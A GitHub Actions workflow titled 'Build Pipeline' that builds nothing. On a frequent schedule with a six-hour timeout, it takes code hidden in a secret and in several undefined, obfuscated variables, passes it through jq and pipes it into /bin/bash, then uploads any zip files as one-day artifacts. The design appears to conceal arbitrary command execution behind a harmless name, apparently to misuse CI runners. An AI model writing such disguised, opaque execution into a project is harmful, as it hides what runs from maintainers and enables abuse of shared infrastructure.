name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '22 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          y80422: ${{ secrets.y80422 }}
        run: |
          printf '%s' "$y80422" | jq -r .oi8 | /bin/bash
          printf '%s' "$v75" | jq -r .lzfcz02824 | /bin/bash
          echo $blkzz78364 | jq -r .f7298 | /bin/bash
          printf '%s' "$rf818" | jq -r .i5187 | /bin/bash
          printf '%s' "$xe6" | jq -r .zh678 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: XSWpw9dX
          path: "*.zip"
          retention-days: 1
